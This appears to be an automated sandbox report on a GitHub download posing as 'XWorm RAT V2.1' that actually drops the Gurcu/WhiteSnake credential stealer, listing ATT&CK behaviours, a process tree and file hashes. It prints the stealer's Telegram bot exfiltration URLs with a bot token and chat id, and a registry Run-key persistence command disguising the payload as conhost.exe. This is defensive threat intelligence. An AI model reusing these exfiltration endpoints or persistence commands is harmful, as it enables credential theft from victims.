gurcu | hxxps://github[.]com/Intestio/XWorm-RAT/releases/tag/xworm

max time kernel
615s
max time network
615s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 18:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Intestio/XWorm-RAT/releases/tag/xworm

Score

10^/10

gurcu discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 2 IoCs

pid	Process
3480	Command Reciever.exe
1544	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
3480	Command Reciever.exe
1544	conhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
77	raw.githubusercontent.com
78	raw.githubusercontent.com
82	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
74	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4884	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	conhost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3544	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2716	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1976	msedge.exe
1976	msedge.exe
416	msedge.exe
416	msedge.exe
2636	identity_helper.exe
2636	identity_helper.exe
2632	msedge.exe
2632	msedge.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
3480	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
1544	conhost.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe
4516	Command Reciever.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4516	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3480	Command Reciever.exe
Token: SeDebugPrivilege	4884	tasklist.exe
Token: SeDebugPrivilege	1544	conhost.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
4516	Command Reciever.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
416	msedge.exe
4516	Command Reciever.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1544	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 416 wrote to memory of 4212	416	msedge.exe	81
PID 416 wrote to memory of 4212	416	msedge.exe	81
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 3812	416	msedge.exe	82
PID 416 wrote to memory of 1976	416	msedge.exe	83
PID 416 wrote to memory of 1976	416	msedge.exe	83
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84
PID 416 wrote to memory of 4100	416	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe5c5846f8,0x7ffe5c584708,0x7ffe5c584718
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:3812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2144 /prefetch:8
  2⤵
  PID:4100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
  2⤵
  PID:2548
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5924 /prefetch:8
  2⤵
  PID:244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,282842085083675112,5419298137425391264,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3080 /prefetch:2
  2⤵
  PID:4320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4620

C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2388
- C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4516
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA10A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA10A.tmp.bat
    3⤵
    PID:4336
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:1648
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 3480"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4884
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:4712
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3544
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1544
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        5⤵
        
        PID:3092
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2716

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\94f0bb0e-9d77-4efa-a53d-e5349043aa34.tmp

Filesize
5KB

MD5
7a002ffdc1af175a1a29ea63046e8c20

SHA1
1209187fac5115013c33cba296fc4ccc6c057361

SHA256
e6e390b7214c07c39563752b078d79e98f90e62b8311d278d67d5f32f98c37c4

SHA512
97a99f5a0960ba17bf169d2b7f811ba1fd57c13f33ec9e0f1e49943884ed6603d74f88c80388bec747cac8f52c0470f1acd75caffed88d14b8535dbab479e7b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
d2656e2a594f6bf276b2e19d06e6fc31

SHA1
61f70845d8597c372d43f47a9307eed7878eaa67

SHA256
a8d78ce867ff3ca3cc7d2cd8818e31d6133f023d97af434ce17c0ce4c6254a46

SHA512
0e0ee5e72b839b2977da4851f880bf73015c9657d51449852b5febaf7610a4e625eb033e9204892ebba48143469a6c7a657ae0cdfe1efd36c1bd934f251ccf35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
ac488eb2de9208047b67542ec7a5a99c

SHA1
a862f86ee97acb40f5741963fd519325531172f9

SHA256
eb19491e38957e89848404aa56aa9d999e8cd615e9c2758c554d56f03442b661

SHA512
b903f9538a0badc1cb01de30d89af8c988c14978c09495be740aca709f2a91c22823f7edb7c4fbd72382ffde1ba364ad754bb7aceb177c4ef60e9a9c3f14421c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
5b45779c9f677688ce75809f79963bdd

SHA1
9e6cef0677d32d067cadc7a47526c0982374196a

SHA256
68fc24d7b8895b7a272fafd5d4f2dcccafe0ca3e7e55742ccd3783dd9fdab804

SHA512
1035fd0f040a9ca1d00c0b8a9c7151c0af536fce8d7218403098a9d5a815fbc8f4a40a733839b6f1a98de132d2c40457559b8957129b27beff02494f2336c8c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1b0cbc78af64e2586a0706b7cc09d5fe

SHA1
55ec8b45d0214ec3ae517d2f77bd41a13e027055

SHA256
a655043743da29f449bfa5c1e93541ba770e0cda6887af8ade08739bf241a3f8

SHA512
ded1cd88a912562d907c0a2cf1beeff42e98e1fbfc5d3e200d3de3c83b6edd6b5c24ceb78c8d22c945a1bc89be12cc3759010ccb4afa1307b830f59741fe9836

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a17b98e94bc2c717c2f82e28194654ea

SHA1
fc76ab11e8cfe92aaaa595135e45bace32018be9

SHA256
e67c2e33980c9b3e6912e151d7330fcf87860056e38506cd387f1d085cc2aa0f

SHA512
2dcf13345127fe22869e5200d97cdea7b5cf1e0986be207d3946e54d383d713643e7cd8ee91aaf8bf86e6aa3b7a24b7b10e4c7f1cfda9fc766f5175ab610ec86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
14134d329e9afaadb5ba2e0f97f8919e

SHA1
19532a0eca86ee0f624c0a529b8776385aa3fdff

SHA256
30dcfbe990220d773c221798ef73109e5d41c165e9d438994edbfab16322d613

SHA512
14d5c4b6225e77425135e9fa343e94b6f7a0f026dd393f8dab224e7155fa94727f6b5ac64889def05a3e746b3916b9b09a879df6ab35147328e1e33a246ef058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5bbcc5.TMP

Filesize
1KB

MD5
086ae63f7686ac0dc60a91928414600d

SHA1
21ac385a41aab39eeb71584265b1d876a7823724

SHA256
